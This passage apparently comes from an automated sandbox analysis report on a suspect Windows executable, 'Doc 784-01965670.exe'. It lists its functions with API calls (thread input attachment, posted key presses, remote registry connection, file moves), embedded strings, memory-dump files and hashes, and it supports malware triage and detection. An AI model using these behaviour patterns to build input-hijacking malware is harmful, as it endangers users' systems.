                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                                                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                                                                                                    • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2156557900-0
                                                                                                                                    • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                                                    • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                                                                                    • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                                                                    • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                                                                                                                                    Function 0045F776 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 446COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wcsicoll
                                                                                                                                    • String ID: 0%d$DOWN$OFF
                                                                                                                                    • API String ID: 3832890014-468733193
                                                                                                                                    • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                                                                    • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                                                                                                                    • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                                                                    • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                                                                                                                    Function 0045E912 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 353timeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                                                                                    • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                                                                                    • VariantClear.OLEAUT32 ref: 0045E970
                                                                                                                                    • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                                                                                    • __swprintf.LIBCMT ref: 0045EB1F
                                                                                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                                                                                    Strings
                                                                                                                                    • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                                    • API String ID: 43541914-1568723262
                                                                                                                                    • Opcode ID: 37b26c3e130c1a31af09048bf95897f87bf3bde4777f47a21ee6b10bd43e23e8
                                                                                                                                    • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                                                                                    • Opcode Fuzzy Hash: 37b26c3e130c1a31af09048bf95897f87bf3bde4777f47a21ee6b10bd43e23e8
                                                                                                                                    • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                                                                                    Function 0042FE54 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 298sleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                                                                                                                    • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DecrementInterlocked$Sleep
                                                                                                                                    • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                                                                                                    • API String ID: 2250217261-3412429629
                                                                                                                                    • Opcode ID: 8ee3dc3b90658de1bdba7935e7c509bae4c97cbbd898303c1487c3161a53cb39
                                                                                                                                    • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                                                                                                                    • Opcode Fuzzy Hash: 8ee3dc3b90658de1bdba7935e7c509bae4c97cbbd898303c1487c3161a53cb39
                                                                                                                                    • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                                                                                                    Function 004689FF Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 288COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                                    • API String ID: 0-1603158881
                                                                                                                                    • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                                    • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                                                                                    • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                                                                    • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                                                                                    Function 00479C97 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 274COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 00479D1F
                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                                                                      • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                                                                      • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                                                                      • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                                                                      • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                                                                                    • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                    • API String ID: 665237470-60002521
                                                                                                                                    • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                                    • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                                                                                    • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                                                                    • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                                                                                    Function 0046A75F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 179registryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ConnectRegistry_wcslen
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 535477410-2761332787
                                                                                                                                    • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                                                    • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                                                                                    • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                                                                    • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                                                                                    Function 0045F2C5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 146windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • _memset.LIBCMT ref: 0045F317
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                                                                                                    • IsMenu.USER32(?), ref: 0045F380
                                                                                                                                    • CreatePopupMenu.USER32 ref: 0045F3C5
                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                    • String ID: 0$2
                                                                                                                                    • API String ID: 3311875123-3793063076
                                                                                                                                    • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                                    • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                                                                                    • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                                                                    • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                                                                                    Function 0043717F Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 46windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\Doc 784-01965670.exe), ref: 0043719E
                                                                                                                                    • LoadStringW.USER32(00000000), ref: 004371A7
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                                                                                    • LoadStringW.USER32(00000000), ref: 004371C0
                                                                                                                                    • _printf.LIBCMT ref: 004371EC
                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\Desktop\Doc 784-01965670.exe, xrefs: 00437189
                                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HandleLoadModuleString$Message_printf
                                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\Doc 784-01965670.exe
                                                                                                                                    • API String ID: 220974073-1046979815
                                                                                                                                    • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                                    • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                                                                                    • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                                                                    • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                                                                                    Function 00456168 Relevance: 13.7, APIs: 9, Instructions: 181COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                                    • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                                                                                    • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                                                                    • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                                                                                    Function 004534EB Relevance: 13.6, APIs: 9, Instructions: 150filestringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Doc 784-01965670.exe,?,C:\Users\user\Desktop\Doc 784-01965670.exe,004A8E80,C:\Users\user\Desktop\Doc 784-01965670.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                      • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 978794511-0
                                                                                                                                    • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                                    • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                                                                                    • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                                                                    • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                                                                                    Function 004417BC Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                                    • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                                                                                    • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                                                                                    • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                                                                                    Function 00445CF9 Relevance: 13.6, APIs: 9, Instructions: 69sleepkeyboardwindowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                                                                                      • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                                                                                                                      • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                                                                                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                                                                                    • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                                                                                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                                                                                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2014098862-0
                                                                                                                                    • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                                    • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                                                                                    • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                                                                                    • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                                                                                                    Function 0045427D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 259libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
